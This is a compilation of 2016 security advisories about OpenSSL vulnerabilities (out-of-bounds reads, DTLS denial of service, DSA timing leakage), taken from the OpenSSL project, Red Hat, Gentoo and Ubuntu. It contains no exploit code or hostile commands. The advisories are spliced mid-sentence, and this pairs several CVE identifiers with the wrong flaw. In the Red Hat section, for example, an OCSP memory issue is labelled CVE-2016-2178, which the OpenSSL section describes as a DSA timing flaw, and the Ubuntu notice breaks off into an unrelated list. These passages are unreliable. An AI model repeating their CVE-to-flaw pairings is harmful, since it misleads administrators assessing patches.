OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
OOB read in TS_OBJ_print_bio() (CVE-2016-2180)
==============================================
Severity: Low
The function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is
the total length the OID text representation would use and not the amount
of data written. This will result in OOB reads when large OIDs are presented.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Pointer arithmetic undefined behaviour (CVE-2016-2177)
======================================================
Severity: Low
Avoid some undefined pointer arithmetic
A common idiom in the codebase is to check limits in the following manner:
"p + len > limit"
Where "p" points to some malloc'd data of SIZE bytes and
limit == p + SIZE
"len" here could be from some externally supplied data (e.g. from a TLS
message).
The rules of C pointer arithmetic are such that "p + len" is only well
defined where len <= SIZE. Therefore the above idiom is actually
undefined behaviour.
For example this could cause problems if some malloc implementation
provides an address for "p" such that "p + len" actually overflows for
values of len that are too big and therefore p + len < limit.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The
fix was developed by Matt Caswell of the OpenSSL development team.
Constant time flag not preserved in DSA signing (CVE-2016-2178)
===============================================================
Severity: Low
Operations in the DSA signing algorithm should run in constant time in order to
avoid side channel attacks. A flaw in the OpenSSL DSA implementation means that
a non-constant time codepath is followed for certain operations. This has been
demonstrated through a cache-timing attack to be sufficient for an attacker to
recover the private DSA key.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 23rd May 2016 by César Pereida (Aalto
University), Billy Brumley (Tampere University of Technology), and Yuval Yarom
(The University of Adelaide and NICTA). The fix was developed by César Pereida.
DTLS buffered message DoS (CVE-2016-2179)
=========================================
Severity: Low
In a DTLS connection where handshake messages are delivered out-of-order those
messages that OpenSSL is not yet ready to process will be buffered for later
use. Under certain circumstances, a flaw in the logic means that those messages
do not get removed from the buffer even though the handshake has been completed.
An attacker could force up to approx. 15 messages to remain in the buffer when
they are no longer required. These messages will be cleared when the DTLS
connection is closed. The default maximum size for a message is 100k. Therefore
the attacker could force an additional 1500k to be consumed per connection. By
opening many simulataneous connections an attacker could cause a DoS attack
through memory exhaustion.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was
developed by Matt Caswell of the OpenSSL development team.
DTLS replay protection DoS (CVE-2016-2181)
==========================================
Severity: Low
A flaw in the DTLS replay attack protection mechanism means that records that
arrive for future epochs update the replay protection "window" before the MAC
for the record has been validated. This could be exploited by an attacker by
sending a record for the next epoch (which does not have to decrypt or have a
valid MAC), with a very large sequence number. This means that all subsequent
legitimate packets are dropped causing a denial of service for a specific
DTLS connection.
OpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team.
The fix was developed by Matt Caswell of the OpenSSL development team.
Certificate message OOB reads (CVE-2016-6306)
=============================================
Severity: Low
In OpenSSL 1.0.2 and earlier some missing message length checks can result in
OOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical
DoS risk but this has not been observed in practice on common platforms.
The messages affected are client certificate, client certificate request and
server certificate. As a result the attack can only be performed against
a client or a server which enables client authentication.
OpenSSL 1.1.0 is not affected.
OpenSSL 1.0.2 users should upgrade to 1.0.2i
OpenSSL 1.0.1 users should upgrade to 1.0.1u
This issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL
development team.
Excessive allocation of memory in tls_get_message_header() (CVE-2016-6307)
==========================================================================
Severity: Low
A TLS message includes 3 bytes for its length in the header for the message.
This would allow for messages up to 16Mb in length. Messages of this length are
excessive and OpenSSL includes a check to ensure that a peer is sending
reasonably sized messages in order to avoid too much memory being consumed to
service a connection. A flaw in the logic of version 1.1.0 means that memory for
the message is allocated too early, prior to the excessive message length
check. Due to way memory is allocated in OpenSSL this could mean an attacker
could force up to 21Mb to be allocated to service a connection. This could lead
to a Denial of Service through memory exhaustion. However, the excessive message
length check still takes place, and this would cause the connection to
immediately fail. Assuming that the application calls SSL_free() on the failed
conneciton in a timely manner then the 21Mb of allocated memory will then be
immediately freed again. Therefore the excessive memory allocation will be
transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the
event that the connection fails
or
2) The application is working in a constrained environment where there
is very little free memory
or
3) The attacker initiates multiple connection attempts such that there
are multiple connections in a state where memory has been allocated for
the connection; SSL_free() has not yet been called; and there is
insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to
be transitory because as soon as the connection fails the memory is
subsequently freed again in the SSL_free() call. However there is an
increased risk during this period of application crashes due to the lack
of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
=============================================================================
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different
but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message.
This would allow for messages up to 16Mb in length. Messages of this length are
excessive and OpenSSL includes a check to ensure that a peer is sending
reasonably sized messages in order to avoid too much memory being consumed to
service a connection. A flaw in the logic of version 1.1.0 means that memory for
the message is allocated too early, prior to the excessive message length
check. Due to way memory is allocated in OpenSSL this could mean an attacker
could force up to 21Mb to be allocated to service a connection. This could lead
to a Denial of Service through memory exhaustion. However, the excessive message
length check still takes place, and this would cause the connection to
immediately fail. Assuming that the application calls SSL_free() on the failed
conneciton in a timely manner then the 21Mb of allocated memory will then be
immediately freed again. Therefore the excessive memory allocation will be
transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the
event that the connection fails
or
2) The application is working in a constrained environment where there
is very little free memory
or
3) The attacker initiates multiple connection attempts such that there
are multiple connections in a state where memory has been allocated for
the connection; SSL_free() has not yet been called; and there is
insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to
be transitory because as soon as the connection fails the memory is
subsequently freed again in the SSL_free() call. However there is an
increased risk during this period of application crashes due to the lack
of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL
version 1.0.1 will cease on 31st December 2016. No security updates for that
version will be provided after that date. Users of 1.0.1 are advised to
upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those
versions are no longer receiving security updates.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details
over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/policies/secpolicy.html
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: openssl security update
Advisory ID: RHSA-2016:1940-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html
Issue date: 2016-09-27
CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179
CVE-2016-2180 CVE-2016-2181 CVE-2016-2182
CVE-2016-6302 CVE-2016-6304 CVE-2016-6306
=====================================================================
1. Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and
Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and
Transport Layer Security (TLS) protocols, as well as a full-strength
general-purpose cryptography library. A remote attacker
could cause a TLS server using OpenSSL to consume an excessive amount of
memory and, possibly, exit unexpectedly after exhausting all available
memory, if it enabled OCSP stapling support.
(CVE-2016-2178)
* It was discovered that the Datagram TLS (DTLS) implementation could fail
to release memory in certain cases. A malicious DTLS client could cause a
DTLS server using OpenSSL to consume an excessive amount of memory and,
possibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw
to make a DTLS server using OpenSSL to reject further packets sent from a
DTLS client over an established DTLS connection. (CVE-2016-2181)
* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()
function. (CVE-2016-2182)
* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL
protocol. A man-in-the-middle attacker could use this flaw to recover some
plaintext data by capturing large amounts of encrypted traffic between
TLS/SSL server and client if the communication used a DES/3DES based
ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES
cipher suites so they are not preferred over cipher suites using AES. For
compatibility reasons, DES cipher suites remain enabled by default and
included in the set of cipher suites identified by the HIGH cipher string.
Future updates may move them to MEDIUM or not enable them by default.
* An integer underflow flaw leading to a buffer over-read was found in the
way OpenSSL parsed TLS session tickets. (CVE-2016-6302)
* Multiple integer overflow flaws were found in the way OpenSSL performed
pointer arithmetic. A remote attacker could possibly use these flaws to
cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
* An out of bounds read flaw was found in the way OpenSSL formatted Public
Key Infrastructure Time-Stamp Protocol data for printing. An attacker could
possibly cause an application using OpenSSL to crash if it printed time
stamp data from the attacker. A remote attacker could
possibly use these flaws to crash a TLS/SSL server or client using OpenSSL.
(CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304
and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library
must be restarted, or the system rebooted.
5. Bugs fixed (https://bugzilla.redhat.com/):
1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase
1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation
1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()
1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()
1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection
1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)
1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer
1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks
1377594 - CVE-2016-6306 openssl: certificate message OOB reads
1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
openssl-1.0.1e-48.el6_8.3.src.rpm
i386:
openssl-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
x86_64:
openssl-1.0.1e-48.el6_8.3.i686.rpm
openssl-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
openssl-perl-1.0.1e-48.el6_8.3.i686.rpm
openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
openssl-1.0.1e-48.el6_8.3.src.rpm
x86_64:
openssl-1.0.1e-48.el6_8.3.i686.rpm
openssl-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
openssl-1.0.1e-48.el6_8.3.src.rpm
i386:
openssl-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
ppc64:
openssl-1.0.1e-48.el6_8.3.ppc.rpm
openssl-1.0.1e-48.el6_8.3.ppc64.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm
openssl-devel-1.0.1e-48.el6_8.3.ppc.rpm
openssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm
s390x:
openssl-1.0.1e-48.el6_8.3.s390.rpm
openssl-1.0.1e-48.el6_8.3.s390x.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm
openssl-devel-1.0.1e-48.el6_8.3.s390.rpm
openssl-devel-1.0.1e-48.el6_8.3.s390x.rpm
x86_64:
openssl-1.0.1e-48.el6_8.3.i686.rpm
openssl-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-perl-1.0.1e-48.el6_8.3.i686.rpm
openssl-static-1.0.1e-48.el6_8.3.i686.rpm
ppc64:
openssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm
openssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm
openssl-static-1.0.1e-48.el6_8.3.ppc64.rpm
s390x:
openssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm
openssl-perl-1.0.1e-48.el6_8.3.s390x.rpm
openssl-static-1.0.1e-48.el6_8.3.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
openssl-1.0.1e-48.el6_8.3.src.rpm
i386:
openssl-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
x86_64:
openssl-1.0.1e-48.el6_8.3.i686.rpm
openssl-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-devel-1.0.1e-48.el6_8.3.i686.rpm
openssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
openssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm
openssl-perl-1.0.1e-48.el6_8.3.i686.rpm
openssl-static-1.0.1e-48.el6_8.3.i686.rpm
x86_64:
openssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm
openssl-static-1.0.1e-48.el6_8.3.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64:
openssl-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-libs-1.0.1e-51.el7_2.7.i686.rpm
openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-devel-1.0.1e-51.el7_2.7.i686.rpm
openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-static-1.0.1e-51.el7_2.7.i686.rpm
openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64:
openssl-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-libs-1.0.1e-51.el7_2.7.i686.rpm
openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-devel-1.0.1e-51.el7_2.7.i686.rpm
openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-static-1.0.1e-51.el7_2.7.i686.rpm
openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
openssl-1.0.1e-51.el7_2.7.src.rpm
ppc64:
openssl-1.0.1e-51.el7_2.7.ppc64.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm
openssl-devel-1.0.1e-51.el7_2.7.ppc.rpm
openssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm
openssl-libs-1.0.1e-51.el7_2.7.ppc.rpm
openssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le:
openssl-1.0.1e-51.el7_2.7.ppc64le.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm
openssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm
openssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x:
openssl-1.0.1e-51.el7_2.7.s390x.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm
openssl-devel-1.0.1e-51.el7_2.7.s390.rpm
openssl-devel-1.0.1e-51.el7_2.7.s390x.rpm
openssl-libs-1.0.1e-51.el7_2.7.s390.rpm
openssl-libs-1.0.1e-51.el7_2.7.s390x.rpm
x86_64:
openssl-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-devel-1.0.1e-51.el7_2.7.i686.rpm
openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-libs-1.0.1e-51.el7_2.7.i686.rpm
openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
openssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm
openssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm
openssl-static-1.0.1e-51.el7_2.7.ppc.rpm
openssl-static-1.0.1e-51.el7_2.7.ppc64.rpm
ppc64le:
openssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm
openssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm
openssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm
s390x:
openssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm
openssl-perl-1.0.1e-51.el7_2.7.s390x.rpm
openssl-static-1.0.1e-51.el7_2.7.s390.rpm
openssl-static-1.0.1e-51.el7_2.7.s390x.rpm
x86_64:
openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-static-1.0.1e-51.el7_2.7.i686.rpm
openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
openssl-1.0.1e-51.el7_2.7.src.rpm
x86_64:
openssl-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-devel-1.0.1e-51.el7_2.7.i686.rpm
openssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-libs-1.0.1e-51.el7_2.7.i686.rpm
openssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
openssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm
openssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm
openssl-static-1.0.1e-51.el7_2.7.i686.rpm
openssl-static-1.0.1e-51.el7_2.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2016-2177
https://access.redhat.com/security/cve/CVE-2016-2178
https://access.redhat.com/security/cve/CVE-2016-2179
https://access.redhat.com/security/cve/CVE-2016-2180
https://access.redhat.com/security/cve/CVE-2016-2181
https://access.redhat.com/security/cve/CVE-2016-2182
https://access.redhat.com/security/cve/CVE-2016-6302
https://access.redhat.com/security/cve/CVE-2016-6304
https://access.redhat.com/security/cve/CVE-2016-6306
https://access.redhat.com/security/updates/classification/#important
https://www.openssl.org/news/secadv/20160922.txt
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI
xpTW7ApBLmKhVjs49DGYouI=
=4VgY
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. Solution:
The References section of this erratum contains a download link (you must
log in to download the update). Before applying the update, back up your
existing Red Hat JBoss Web Server installation (including all applications
and configuration files).
After installing the updated packages, the httpd daemon will be restarted
automatically.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201612-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: OpenSSL: Multiple vulnerabilities
Date: December 07, 2016
Bugs: #581234, #585142, #585276, #591454, #592068, #592074,
#592082, #594500, #595186
ID: 201612-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in OpenSSL, the worst of which
allows attackers to conduct a time based side-channel attack.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.2j >= 1.0.2j
Description
===========
Multiple vulnerabilities have been discovered in OpenSSL. Please review
the CVE identifiers and the International Association for Cryptologic
Research's (IACR) paper, "Make Sure DSA Signing Exponentiations Really
are Constant-Time" for further details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All OpenSSL users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.2j"
References
==========
[ 1 ] CVE-2016-2105
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2105
[ 2 ] CVE-2016-2106
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2106
[ 3 ] CVE-2016-2107
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2107
[ 4 ] CVE-2016-2108
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2108
[ 5 ] CVE-2016-2109
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2109
[ 6 ] CVE-2016-2176
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2176
[ 7 ] CVE-2016-2177
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2177
[ 8 ] CVE-2016-2178
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2178
[ 9 ] CVE-2016-2180
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2180
[ 10 ] CVE-2016-2183
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2183
[ 11 ] CVE-2016-6304
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6304
[ 12 ] CVE-2016-6305
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6305
[ 13 ] CVE-2016-6306
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-6306
[ 14 ] CVE-2016-7052
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7052
[ 15 ] Make Sure DSA Signing Exponentiations Really are Constant-Time
http://eprint.iacr.org/2016/594.pdf
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-16
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ==========================================================================
Ubuntu Security Notice USN-3087-2
September 23, 2016
openssl regression
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was
incomplete and caused a regression when parsing certificates. This update
fixes the problem.
We apologize for the inconvenience. This
issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)
Quan Luo discovered that OpenSSL did not properly restrict the lifetime
of queue entries in the DTLS implementation. (CVE-2016-2181)
Shi Lei discovered that OpenSSL incorrectly validated division results.
(CVE-2016-2182)
Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES
ciphers were vulnerable to birthday attacks.
(CVE-2016-2183)
Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)
Shi Lei discovered that OpenSSL incorrectly performed certain message
length checks. (CVE-2016-6306)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.04 LTS:
libssl1.0.0 1.0.2g-1ubuntu4.5
Ubuntu 14.04 LTS:
libssl1.0.0 1.0.1f-1ubuntu2.21
Ubuntu 12.04 LTS:
libssl1.0.0 1.0.1-4ubuntu5.38
After a standard system update you need to reboot your computer to make
all the necessary changes. Description:
